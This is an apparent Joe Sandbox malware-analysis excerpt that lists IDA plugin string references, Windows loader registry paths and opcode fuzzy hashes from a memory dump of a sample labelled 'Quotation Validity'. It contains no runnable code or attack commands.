                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                • API String ID: 0-2968386058
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                • API String ID: 0-1373925480
                                                                                Strings
                                                                                • RtlCreateActivationContext, xrefs: 013E29F9
                                                                                • SXS: %s() passed the empty activation context data, xrefs: 013E29FE
                                                                                • Actx , xrefs: 013A33AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                • API String ID: 0-859632880
                                                                                Strings
                                                                                • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 013FB632
                                                                                • GlobalFlag, xrefs: 013FB68F
                                                                                • @, xrefs: 013FB670
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                • API String ID: 0-4192008846
                                                                                Strings
                                                                                • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 013B127B
                                                                                • @, xrefs: 013B12A5
                                                                                • BuildLabEx, xrefs: 013B130F
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                • API String ID: 0-3051831665
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: #%u
                                                                                • API String ID: 48624451-232158463
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$@
                                                                                • API String ID: 0-149943524
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: `$`
                                                                                • API String ID: 0-197956300
                                                                                Strings
                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 0137A309
                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 0137A2FB
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                • API String ID: 0-2876891731
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                • API String ID: 0-118005554
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .Local\$@
                                                                                • API String ID: 0-380025441
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID: Cleanup Group$Threadpool!
                                                                                • API String ID: 2994545307-4008356553
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @
                                                                                • API String ID: 0-2766056989
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PreferredUILanguages
                                                                                • API String ID: 0-1884656846
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: kLsE
                                                                                • API String ID: 0-3058123920
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: #
                                                                                • API String ID: 0-1885708031
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Actx
                                                                                • API String ID: 0-89312691
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LdrCreateEnclave
                                                                                • API String ID: 0-3262589265
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 818e74702f92bd831872a5b582ef108d8e23a7f4c75d63f51f2e1d0188e0fff6
                                                                                • Instruction ID: 17b7a37226683619d44203cbe982e3fb1de0a9735e7c02422f03a27ce64dd089
                                                                                • Opcode Fuzzy Hash: 818e74702f92bd831872a5b582ef108d8e23a7f4c75d63f51f2e1d0188e0fff6
                                                                                • Instruction Fuzzy Hash: E2C14875608341CFE764CF19C484BABB7E5BF88308F44496DE98997291E778E908CF92
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f2cb9f0242d95f556c5c631519c351853550bc97633b1ff172abb0d8af26013e
                                                                                • Instruction ID: 627667d9d5abef511971a9977922cd8f3a67f93553a47967d5aeae03a85a5248
                                                                                • Opcode Fuzzy Hash: f2cb9f0242d95f556c5c631519c351853550bc97633b1ff172abb0d8af26013e
                                                                                • Instruction Fuzzy Hash: C8B18270A0026A8BDB24DF59C890BA9B7B5EF44708F04C5EAD64AE7245EB30DDC5CB24
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 620982421524f97aa9cc38d944b7b38fdb0650187a43d41f8700729f21857e63
                                                                                • Instruction ID: 6b923302bc62c3c5d79ceeec44a8518f477e7afdf993934aa3e1e9dde168dd5f
                                                                                • Opcode Fuzzy Hash: 620982421524f97aa9cc38d944b7b38fdb0650187a43d41f8700729f21857e63
                                                                                • Instruction Fuzzy Hash: 3DA10732E00659AFEF21DB6CD884BAEBBB8AF0075CF050125EA11AB2D1D7749D45CBD1
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 02eb2104039bf702fb42778cdaed4d4118d4c34be5de28c2be16ec5c260f7f04
                                                                                • Instruction ID: ccaa7ca5b23e3ba40e12108cc393e002a5bb64a1e485d70ee72dee0156db7b8e
                                                                                • Opcode Fuzzy Hash: 02eb2104039bf702fb42778cdaed4d4118d4c34be5de28c2be16ec5c260f7f04
                                                                                • Instruction Fuzzy Hash: 69A1B070B0171A9BDB29CF69C5D47AAB7B5FF5431CF04402AEB05A7691EB34E801CB50
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b27d4d053a08205302a336adb97a4834744e1669392ee38fcb6ad0b274a6e76d
                                                                                • Instruction ID: 73eb078c0cbe8e9bcd4a03c70a502868aff399e173d4b8114b850a6028ce14b8
                                                                                • Opcode Fuzzy Hash: b27d4d053a08205302a336adb97a4834744e1669392ee38fcb6ad0b274a6e76d
                                                                                • Instruction Fuzzy Hash: 7AA1DE72A00612DFEB21DF18C980B6AB7E9FF48708F09452AF6499B761D734ED01CB91
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2c170f339d3b7795bbe4bbdfecd27637ebf6984f6423238ae3f51582df7c7fb3
                                                                                • Instruction ID: d3a871fe42a177d00f5065290288e71ef120e97b50d943d80caec47ca2ec8bf4
                                                                                • Opcode Fuzzy Hash: 2c170f339d3b7795bbe4bbdfecd27637ebf6984f6423238ae3f51582df7c7fb3
                                                                                • Instruction Fuzzy Hash: 819191B5D0021AAFDF15CF68D885BAEBBB9EB48718F15416DE710EB351D734E9008BA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 974bb5b9fa9244c88164858c5ee701c051b196ab6043ef470e97cf199856854a
                                                                                • Instruction ID: c96f8af73e86079141f56146cc55cb48b923d31c46b065db761b6ec874e81506
                                                                                • Opcode Fuzzy Hash: 974bb5b9fa9244c88164858c5ee701c051b196ab6043ef470e97cf199856854a
                                                                                • Instruction Fuzzy Hash: 9C912332A00716CBEB24EB6DD480B7ABBA5EF9471CF154069ED09AB391E634DD01C762
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3c08b830a4335febdb47e12b22150513fb3303c76b9ffb511104b3c353c5b256
                                                                                • Instruction ID: 16a2d59168db4a599e87c61782a252987a0e25ed7038af6296fae18195afb27b
                                                                                • Opcode Fuzzy Hash: 3c08b830a4335febdb47e12b22150513fb3303c76b9ffb511104b3c353c5b256
                                                                                • Instruction Fuzzy Hash: CAB101B16093418FD364CF28C480A5AFBF5BB88708F18496EF999DB352D335E945CB52
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                • Instruction ID: 8996a8b0898fc1401897544a72e0623316f9b2c6ab950a0c0c6c0153da385b50
                                                                                • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                • Instruction Fuzzy Hash: 8A719235A0022A9BDF21CF69C480ABFBBF5EF94744F99415BD940AB361E734D9C18B90
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                • Instruction ID: 37f518898f6878d0d01741e375e9852f744dbea95c61cf3457ccfe5417654717
                                                                                • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                • Instruction Fuzzy Hash: 53816C73E0011A8FDF15DFACD9817ADBBB2FB84318F19817AD919AB344DA3199408B91
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9e1667c615c046bdbaefcf081c16c58945407e44acdc5390b00b0338e1797ab2
                                                                                • Instruction ID: 68fa94d27d6a08110e8da2ddd588bf04cce966876288c0e847a4f96810aa7fb9
                                                                                • Opcode Fuzzy Hash: 9e1667c615c046bdbaefcf081c16c58945407e44acdc5390b00b0338e1797ab2
                                                                                • Instruction Fuzzy Hash: A0816D71A00609EFDB25DFA9C880BEEBBF9FF88358F504529E555A7290D730AC45CB60
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                • Instruction ID: eb62c0ce678a56943da5206056d7f279d476929b92a5a21a0632d96f6fafcc3f
                                                                                • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                • Instruction Fuzzy Hash: 72715D71A0061AEFDB14DFADC984EDEBBB9FF48708F104569E605A7251DB34EA01CB90
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 021baac9e9494b290edad145d706be101ae54fffd814757316dcdd87b677be81
                                                                                • Instruction ID: 748a5311e087e5bbd2a3ff911c389be550ee62a34a1fd655c355741c82fa38be
                                                                                • Opcode Fuzzy Hash: 021baac9e9494b290edad145d706be101ae54fffd814757316dcdd87b677be81
                                                                                • Instruction Fuzzy Hash: 2871EF32200701AFEB23DF1AC884F56BBA6EF40724F16453AE6568B6F0DB74E955CB50
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b6db544986ecb5c4cc3fae0935709e2e95ab9d3ffee3857a4efefc9e65922348
                                                                                • Instruction ID: ef78f3006b3df0c9308b8ca6a4185ba7465cfe62d34e4a42f133378d3d4097cb
                                                                                • Opcode Fuzzy Hash: b6db544986ecb5c4cc3fae0935709e2e95ab9d3ffee3857a4efefc9e65922348
                                                                                • Instruction Fuzzy Hash: 84818E75A00205DFCB09CFA9C480AAEBBF1FF98300F1581AAD859EB355D734EA51CB90
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 12521b2a01eca68ba1542f3415af125f0de8de8a71962db4e5d24d60576c8029
                                                                                • Instruction ID: a71b26dd27f87abf69d73b2eda842c8919503b120f211a80725cc828e55f6b7f
                                                                                • Opcode Fuzzy Hash: 12521b2a01eca68ba1542f3415af125f0de8de8a71962db4e5d24d60576c8029
                                                                                • Instruction Fuzzy Hash: 5861ECB1600712AFD715DF69C884BABBBA8FFD8718F00461EF85893260DB70E915CB91
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 04b13573d5b4f43f7e2d64d63b8a772af78a0c9b8f020120b92c364b5fd12d68
                                                                                • Instruction ID: f37352beb8fb8dfd9d8561aab3ea1e7f819c224d009d02e750de61d956e9298b
                                                                                • Opcode Fuzzy Hash: 04b13573d5b4f43f7e2d64d63b8a772af78a0c9b8f020120b92c364b5fd12d68
                                                                                • Instruction Fuzzy Hash: 486109712087428BE315DF69C494B6BB7E0BFE8718F18046EE9858B3A1D7B1E806C781
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d9d3f00c41e7eb04fffc66f1c0a1a4ebd423213d7798e4716f51eee78137cced
                                                                                • Instruction ID: 084cf10087b1c467027c6e3361a2c75f981e3ffe411ed3f67d3b1674f56a81b0
                                                                                • Opcode Fuzzy Hash: d9d3f00c41e7eb04fffc66f1c0a1a4ebd423213d7798e4716f51eee78137cced
                                                                                • Instruction Fuzzy Hash: B241E331300601AFDB269F1DD940B26BBA9FF5475CF258429EA19DB269DB31DC418F90
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1f7a6f21deedaaf3f723358eb9647920322d5f5252174c9d915eb55bb1dfff8e
                                                                                • Instruction ID: d79e15ac3727d6176e6e34852b6a1371dcf8e7871c875b70d9874ea564be0ece
                                                                                • Opcode Fuzzy Hash: 1f7a6f21deedaaf3f723358eb9647920322d5f5252174c9d915eb55bb1dfff8e
                                                                                • Instruction Fuzzy Hash: B451B1712043569FE720EF68C885FAB77E8EB9476CF14062DEA11971E5D734E801CBA2
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 244234e42543d42b05092409da3c232bbc9fa701d6b76d5459954ca1aaedf5cf
                                                                                • Instruction ID: d00646b219095c0495b6be50507e71a7604201d2437a47f2b6deeff066eef9e8
                                                                                • Opcode Fuzzy Hash: 244234e42543d42b05092409da3c232bbc9fa701d6b76d5459954ca1aaedf5cf
                                                                                • Instruction Fuzzy Hash: FE31C471B00617BBDB22AF9DC850A6BB7F9AF88758F15006AE505DB361DA30DE018790
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8e01eec6e1609382df833c07fcbae3b5801f01f53c4e374a40fe052291c49e8e
                                                                                • Instruction ID: 970012ee57a8a2a97d517afd804ea7ff92ddedaa5046f0a63dbb85d0a9fa02e4
                                                                                • Opcode Fuzzy Hash: 8e01eec6e1609382df833c07fcbae3b5801f01f53c4e374a40fe052291c49e8e
                                                                                • Instruction Fuzzy Hash: 063189B2609301CFE720CF19C844B6BBBE5FF98718F0549AEE98497251D774E944CB92
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                • Instruction ID: 78f6b3bcfc185553b519ba53c3cf71e5d599c62310862518721371bb7b54cd8c
                                                                                • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                • Instruction Fuzzy Hash: 89312475604206CFC710CF2CC480956BBF6FF99758B2986A9EA589B325E730ED06CF91
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bdbf1af8ab631623e84118113d9844d3bd5359a239d0cabe211f24a5c72e75ad
                                                                                • Instruction ID: 8ed9cf74f5fcc85965777011a8a1e7a196e8b5f4021a1b4ccf3f21bb62a2f392
                                                                                • Opcode Fuzzy Hash: bdbf1af8ab631623e84118113d9844d3bd5359a239d0cabe211f24a5c72e75ad
                                                                                • Instruction Fuzzy Hash: F631E372B002069FDB20EFB8CA81A6EBBF9EF8470CF018529D105E7654D730E942CB90
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                • Instruction ID: 5a4d71cb1dd4508d60e069621827f711883690a25f267aedab43ec4052913d77
                                                                                • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                • Instruction Fuzzy Hash: 6E317A7260834A8FC711DF18D840A5ABBE9EB99728F000569F951973A1D734DC14CBA2
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 81294060deffc28cc995d8350547f92cbc40d3316c47543cd79be00b094b246e
                                                                                • Instruction ID: fe1abc1c59731f4fb9693745689a6006386809b9a0fef75b811a599ea35700b0
                                                                                • Opcode Fuzzy Hash: 81294060deffc28cc995d8350547f92cbc40d3316c47543cd79be00b094b246e
                                                                                • Instruction Fuzzy Hash: B631F6B15003018BDB21AF6CC841BA977B4AF5071CF54816DE98A9B356DA349D86CBD0
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
